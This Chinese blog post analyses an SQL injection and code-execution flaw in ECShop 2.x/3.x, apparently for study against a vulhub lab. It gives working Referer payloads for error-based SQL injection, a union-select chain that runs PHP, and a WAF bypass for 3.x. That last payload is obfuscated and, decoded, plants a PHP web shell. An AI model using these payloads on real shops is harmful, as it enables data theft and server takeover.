ecshop 2.x/3.x sql注入/任意代码执行漏洞

缺乏、安全感 2021-08-31 00:13 350阅读 0赞

影响版本：

Ecshop 2.x

Ecshop 3.x-3.6.0

漏洞分析：

该漏洞影响ECShop 2.x和3.x版本，是一个典型的“二次漏洞”，通过user.php文件中display()函数的模板变量可控，从而造成SQL注入漏洞，而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中，从而实现了任意代码执行。  
  
值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响ECShop 3.x，这个是因为在3.x的版本里有引入防注入攻击的安全代码，通过我们分析发现该防御代码完全可以绕过实现对ECShop 3.x的攻击（详见下文分析）。  
  
注：以下代码分析基于ECShop 2.7.3

SQL注入漏洞分析：

首先我们看一下漏洞的起源点 user.php ，在用户login这里有一段代码：

/* 用户登录界面 */
    elseif ($action == 'login')
    {
        if (empty($back_act))
        {
            if (empty($back_act) && isset($GLOBALS['_SERVER']['HTTP_REFERER']))
            {
                $back_act = strpos($GLOBALS['_SERVER']['HTTP_REFERER'], 'user.php') ? './index.php' : $GLOBALS['_SERVER']['HTTP_REFERER'];
            }
            else
            {
                $back_act = 'user.php';
            }
    
        }
    
    
        $captcha = intval($_CFG['captcha']);
        if (($captcha & CAPTCHA_LOGIN) && (!($captcha & CAPTCHA_LOGIN_FAIL) || (($captcha & CAPTCHA_LOGIN_FAIL) && $_SESSION['login_fail'] > 2)) && gd_version() > 0)
        {
            $GLOBALS['smarty']->assign('enabled_captcha', 1);
            $GLOBALS['smarty']->assign('rand', mt_rand());
        }
    
        $smarty->assign('back_act', $back_act);
        $smarty->display('user_passport.dwt');
    }

Ecshop使用了php模版引擎smarty，该引擎有两个基本的函数assign()、display()。assign()函数用于在模版执行时为模版变量赋值，display()函数用于显示模版。

smarty运行时，会读取模版文件，将模版文件中的占位符替换成assign()函数传递过来的参数值，并输出一个编译处理后的php文件，交由服务器运行。

可以看到 $back\_act 是从 $GLOBALS\['\_SERVER'\]\['HTTP\_REFERER'\] 获取到的，HTTP\_REFERER 是外部可控的参数，这也是我们注入payload的源头。

在模版执行时，assign()把 $back\_act 赋值给模版变量 back\_act ，下面我们跟进这个模版变量到 /includes/cls\_template.php ：

/**
         * 注册变量
         *
         * @access  public
         * @param   mix      $tpl_var
         * @param   mix      $value
         *
         * @return  void
         */
        function assign($tpl_var, $value = '')
        {
            if (is_array($tpl_var))
            {
                foreach ($tpl_var AS $key => $val)
                {
                    if ($key != '')
                    {
                        $this->_var[$key] = $val;
                    }
                }
            }
            else
            {
                if ($tpl_var != '')
                {
                    $this->_var[$tpl_var] = $value;
                }
            }
        }

从上面的assign()函数，我们看出 $tpl\_var 接受我们传过来的参数 $back\_act ，但不是个数组，所以  this−>var\[this−>var\[back\_act\] = $back\_act ，而后调用display()函数来显示模板，在includes/init.php文件中创建了Smarty对象cls\_template来处理模版文件，对应的文件是 includes/cla\_template.php：

从user.php调用display()函数，传递进来的$filename是user\_passport.dwt，从函数来看，首先会调用 $this->fetch 来处理 user\_passport.dwt 模板文件，fetch函数中会用 $this->make\_compiled 来编译模板。user\_passport.dwt其中一段如下：

make\_compiled 会将模板中的变量解析，也就是在这个时候将上面assign中注册到的变量 $back\_act 传递进去了，解析完变量之后返回到display()函数中。此时$out是解析变量后的html内容，后面的代码是判断 $this->\_echash 是否在 $out 中，如果存在的话，使用 $this->\_echash 来分割内容，得到$k然后交给insert\_mod处理，我们来查找 \_echash 的值：

[![format_png][]][format_png 1]

发现 \_echash 是个默认的值，不是随机生成的，所以 $val 内容可随意控制。跟进$this->insert\_mod：

function insert_mod($name) // 处理动态内容
        {
            list($fun, $para) = explode('|', $name);
            $para = unserialize($para);
            $fun = 'insert_' . $fun;
    
            return $fun($para);
        }

$val传递进来，先用 | 分割，得到 $fun 和 $para，$para进行反序列操作，$fun 和 insert\_ 拼接，最后动态调用 fun(fun(para)，函数名部分可控，参数完全可控。接下来就是寻找以 insert\_ 开头的可利用的函数了，在 /includes/lib\_insert.php 有一个 insert\_ads() 函数，正好满足要求。看下 insert\_ads() 函数：

$arr 是可控的，并且 $arr\['id'\] 跟 $arr\['num'\] 会拼接到SQL语句中，这就造成了SQL注入漏洞。  
  
根据上面的流程，可以构造出如下形式的payload

_echash+fun|serialize(array("num"=>sqlpayload,"id"=>1))

由于通过上述分析，$arr\['id'\] 跟 $arr\['num'\] 都会拼接到SQL语句中，所以可以任意构造一个参数为sqlpayload，后面\_echash 是默认的，fun是拼接到函数insert\_后的名字，这里是insert\_ads()，所以fun就是ads，关键是后面payload反序列化字符串如何写，网上比较早之前出现的payload：

Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}

我们把payload还原到语句中：

[![format_png 2][]][format_png 2 1]

可以看到payload顺利添加到sql语句中，来看这个payload序列化语句：

a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1

用在线网站([https://1024tools.com/unserialize][https_1024tools.com_unserialize])反序列化查看：

Array
    (
        [num] => 0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -
        [id] => 1
    )

demo环境测试：

[![format_png 3][]][format_png 3 1]

这是在 $arr\['num'\] 处拼接sql语句，在 $arr\['id'\] 处同样可以构造payload:

Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:3:"669";s:2:"id";s:58:"1' and updatexml(1,make_set(3,'~',(select database())),1)#";

我们把payload还原到语句中：

[![format_png 4][]][format_png 4 1]

demo环境测试：

[![format_png 5][]][format_png 5 1]

构造payload爆出表名：

Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:3:"669";s:2:"id";s:133:"1' and updatexml(1,make_set(3,'~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#";}

demo环境测试：

[![format_png 6][]][format_png 6 1]

当然，同时利用 $arr\['id'\] 和 $arr\['num'\] 两个参数，引入 **/\*\*/** 将 **ORDER BY** 语句注释掉也是可以的，构造payload:

Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:2:"id";s:4:"' /*";s:3:"num";s:132:"*/ and updatexml(1,make_set(3,'~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)";}

我们把payload还原到语句中：

[![format_png 7][]][format_png 7 1]

demo环境测试：

[![format_png 8][]][format_png 8 1]

只要仔细分析源代码，能成功闭合单引号，注释后面多余的内容，payload千千万，我这里只用sql爆错注入的updatexml()方法，其他均可利用！

代码执行漏洞分析：

继续看 insert\_ads() 函数：

$position_style = '';
    
        foreach ($res AS $row)
        {
            if ($row['position_id'] != $arr['id'])
            {
                continue;
            }
            $position_style = $row['position_style'];
            switch ($row['media_type'])
            {
    ......
        $position_style = 'str:' . $position_style;
        $need_cache = $GLOBALS['smarty']->caching;
        $GLOBALS['smarty']->caching = false;
        $GLOBALS['smarty']->assign('ads', $ads);
        $val = $GLOBALS['smarty']->fetch($position_style);
    
        $GLOBALS['smarty']->caching = $need_cache;
    
        return $val;

可以看到在SQL查询结束之后会调用模板类的fetch方法，在user.php中调用 display() 函数，然后调用fetch的时候传入的参数是 user\_passport.dwt，而在此处传入的参数是 $position\_style，向上溯源，发现是 $row\['position\_style'\] 赋值而来，也就是SQL语句查询的结果，结果上面这个SQL注入漏洞，SQL查询的结果可控，也就是 $position\_style可控。要到 positionstyle=positionstyle=row\['position\_style'\];还有一个条件，就是 $row\['position\_id'\] 要等于 $arr\['id'\] ，查询结果可控，arr\['id'\]同样可控。之后 $position\_style会拼接 'str:' 传入fetch函数，跟进fetch方法：

/**
         * 处理模板文件
         *
         * @access  public
         * @param   string      $filename
         * @param   sting      $cache_id
         *
         * @return  sring
         */
        function fetch($filename, $cache_id = '')
        {
            if (!$this->_seterror)
            {
                error_reporting(E_ALL ^ E_NOTICE);
            }
            $this->_seterror++;
    
            if (strncmp($filename,'str:', 4) == 0)
            {
                $out = $this->_eval($this->fetch_str(substr($filename, 4)));
            }
            else
            {
                ......

因为之前拼接 'str:'了，所以strncmp($filename,'str:', 4) == 0为真，然后会调用危险函数$this->\_eval，这就是最终触发漏洞的点。但是参数在传递之前要经过fetch\_str方法的处理，跟进

/**
         * 处理字符串函数
         *
         * @access  public
         * @param   string     $source
         *
         * @return  sring
         */
        function fetch_str($source)
        {
            if (!defined('ECS_ADMIN'))
            {
                $source = $this->smarty_prefilter_preCompile($source);
            }
            $source=preg_replace("/([^a-zA-Z0-9_]{1,1})+(copy|fputs|fopen|file_put_contents|fwrite|eval|phpinfo)+( |\()/is", "", $source);
            if(preg_match_all('~(<\?(?:\w+|=)?|\?>|language\s*=\s*[\"\']?php[\"\']?)~is', $source, $sp_match))
            {
                $sp_match[1] = array_unique($sp_match[1]);
                for ($curr_sp = 0, $for_max2 = count($sp_match[1]); $curr_sp < $for_max2; $curr_sp++)
                {
                    $source = str_replace($sp_match[1][$curr_sp],'%%%SMARTYSP'.$curr_sp.'%%%',$source);
                }
                 for ($curr_sp = 0, $for_max2 = count($sp_match[1]); $curr_sp < $for_max2; $curr_sp++)
                {
                     $source= str_replace('%%%SMARTYSP'.$curr_sp.'%%%', '<?php echo \''.str_replace("'", "\'", $sp_match[1][$curr_sp]).'\'; ?>'."\n", $source);
                }
             }
             return preg_replace("/{([^\}\{\n]*)}/e", "\$this->select('\\1');", $source);
        }

第一个正则会匹配一些关键字，然后置空，主要看下最后一个正则：

preg_replace("/{([^\}\{\n]*)}/e", "\$this->select('\\1');", $source)

[![format_png 9][]][format_png 9 1]

这个正则是将捕获到的值交于 $this-select() 函数处理。例如，$source的值是 abc123\{hello\}456efg ，正则捕获到的就是 hello，然后就会调用 $this-select("hello")。

跟进select函数：

/**
         * 处理{}标签
         *
         * @access  public
         * @param   string      $tag
         *
         * @return  sring
         */
        function select($tag)
        {
            $tag = stripslashes(trim($tag));
    
            if (empty($tag))
            {
                return '{}';
            }
            elseif ($tag{0} == '*' && substr($tag, -1) == '*') // 注释部分
            {
                return '';
            }
            elseif ($tag{0} == '$') // 变量
            {
    //            if(strpos($tag,"'") || strpos($tag,"]"))
    //            {
    //                 return '';
    //            }
                return '<?php echo ' . $this->get_val(substr($tag, 1)) . '; ?>';
            }
            ......

当传入的变量的第一个字符是$，会返回由 php 标签包含变量的字符串，最终返回到\_eval()危险函数内，执行。在返回之前，还调用了$this->get\_var处理，跟进get\_var

/**
         * 处理smarty标签中的变量标签
         *
         * @access  public
         * @param   string     $val
         *
         * @return  bool
         */
        function get_val($val)
        {
            if (strrpos($val, '[') !== false)
            {
                $val = preg_replace("/\[([^\[\]]*)\]/eis", "'.'.str_replace('$','\$','\\1')", $val);
            }
    
            if (strrpos($val, '|') !== false)
            {
                $moddb = explode('|', $val);
                $val = array_shift($moddb);
            }
    
            if (empty($val))
            {
                return '';
            }
    
            if (strpos($val, '.$') !== false)
            {
                $all = explode('.$', $val);
    
                foreach ($all AS $key => $val)
                {
                    $all[$key] = $key == 0 ? $this->make_var($val) : '['. $this->make_var($val) . ']';
                }
                $p = implode('', $all);
            }
            else
            {
                $p = $this->make_var($val);
            }

当传入的变量没有.$时，调用$this->make\_var，跟进make\_var：

/**
         * 处理去掉$的字符串
         *
         * @access  public
         * @param   string     $val
         *
         * @return  bool
         */
        function make_var($val)
        {
            if (strrpos($val, '.') === false)
            {
                if (isset($this->_var[$val]) && isset($this->_patchstack[$val]))
                {
                    $val = $this->_patchstack[$val];
                }
                $p = '$this->_var[\'' . $val . '\']';
            }
            else
            {
               .....

在这里结合select函数里面的语句来看，<?php echo this−>var\[′this−>var\[′val'\];?>，要成功执行代码的话，$val必须要把 \[' 闭合，所以payload构造，从下往上构造，$val为 abc'\];echo phpinfo();//；从select函数进入get\_var的条件是第一个字符是 $，所以payload变成了 $abc'\];echo phpinfo();//；而要进入到select，需要被捕获，payload变成了\{$abc'\];echo phpinfo();//\}，这里因为payload的是phpinfo()，这里会被fetch\_str函数的第一个正则匹配到，需要变换一下，所以payload变为 \{$abc'\];echo phpinfo/\*\*/();//\}，到这里为止，php 恶意代码就构造完成了。  
  
接下来就是把构造好的代码通过SQL注入漏洞传给$position\_style。 这里可以用union select 来控制查询的结果，根据之前的流程，$row\['position\_id'\] 和 $arr\['id'\] 要相等，$row\['position\_id'\]是第二列的结果，$position\_style是第九列的结果。$arr\['id'\]传入' /\* , $arr\['num'\]传入\*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -

0x27202f2a是 ' /\* 的16进制值，也就是$row\['position\_id'\]的值，0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d 是上面构造的php代码 \{$abc'\];echo phpinfo/\*\*/();//\} 的16进制值，也就是$position\_style。

[![format_png 10][]][format_png 10 1]

结合之前的SQL漏洞的payload构造，所以最终的payload的是：

Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:110:"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -";s:2:"id";s:4:"' /*";}554fcae493e564ee0dc75bdf2ebf94ca

demo环境测试：

[![format_png 11][]][format_png 11 1]

可以看到成功执行了 phpinfo();

ECShop 3.x 绕过

上述的测试环境都是2.7.3的，理论上打2.x都没问题，而在3.x上是不行的，原因是3.x自带了个WAF( includes/safety.php )，对所有传入的参数都做了检测，按照上面构造的 payload ，union select 会触发SQL注入的检测规则，有兴趣的可以去绕绕，我没绕过。。  
  
下面的测试版本为ECshop3.0，3.x版本的echash是 45ea207d7a2b68c49582d2d22adf953a 。 上面说了 insert\_ads 函数存在注入，并且有两个可控点，$arr\['id'\] 和 $arr\['num'\]，可以将union select通过两个参数传递进去，一个参数传递一个关键字，中间的可以使用 /\*\*/ 注释掉，这样就不会触发WAF。

Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:286:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:9:"' union/*";}45ea207d7a2b68c49582d2d22adf953aadsa

靶机环境

https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md

[format_png]: /images/20210728/b1e8a8b9bc2241b690a269279b962433.png
[format_png 1]: https://img2018.cnblogs.com/blog/1344396/201811/1344396-20181113172739657-1121374154.png
[format_png 2]: /images/20210728/9dee2a87758f435882b204e82ca731a4.png
[format_png 2 1]: https://img2018.cnblogs.com/blog/1344396/201811/1344396-20181113190608460-69803021.png
[https_1024tools.com_unserialize]: https://1024tools.com/unserialize
[format_png 3]: /images/20210728/c385a199401c4dcb8d93dcb0e83d89a5.png
[format_png 3 1]: https://img2018.cnblogs.com/blog/1344396/201811/1344396-20181113191412379-1585141121.png
[format_png 4]: /images/20210728/849dde4559234f5bb6622cc40345c567.png
[format_png 4 1]: https://img2018.cnblogs.com/blog/1344396/201811/1344396-20181113191855679-374588602.png
[format_png 5]: /images/20210728/885b71a1ccac41219d7970aa02a83b62.png
[format_png 5 1]: https://img2018.cnblogs.com/blog/1344396/201811/1344396-20181113192003046-1129954762.png
[format_png 6]: /images/20210728/02cfe77f60f346d7aa2b4236785e452a.png
[format_png 6 1]: https://img2018.cnblogs.com/blog/1344396/201811/1344396-20181113192258970-220352954.png
[format_png 7]: /images/20210728/91fb9c7696544bc2ace67dbd714130ad.png
[format_png 7 1]: https://img2018.cnblogs.com/blog/1344396/201811/1344396-20181113192910100-1281631312.png
[format_png 8]: /images/20210728/53ccf4ea13684aa6b9942a012bc1ee7d.png
[format_png 8 1]: https://img2018.cnblogs.com/blog/1344396/201811/1344396-20181113192748613-136948441.png
[format_png 9]: /images/20210728/232c3950b4ff41c7a2a723336aa8f966.png
[format_png 9 1]: https://img2018.cnblogs.com/blog/1344396/201811/1344396-20181113200613126-962543310.png
[format_png 10]: /images/20210728/c72539cb23a1492fbd4824b335c70a64.png
[format_png 10 1]: https://img2018.cnblogs.com/blog/1344396/201811/1344396-20181113201646225-1988210929.png
[format_png 11]: /images/20210728/0cfb7f569d694c6d819e930ef86d2d6c.png
[format_png 11 1]: https://img2018.cnblogs.com/blog/1344396/201811/1344396-20181113202031767-830237682.png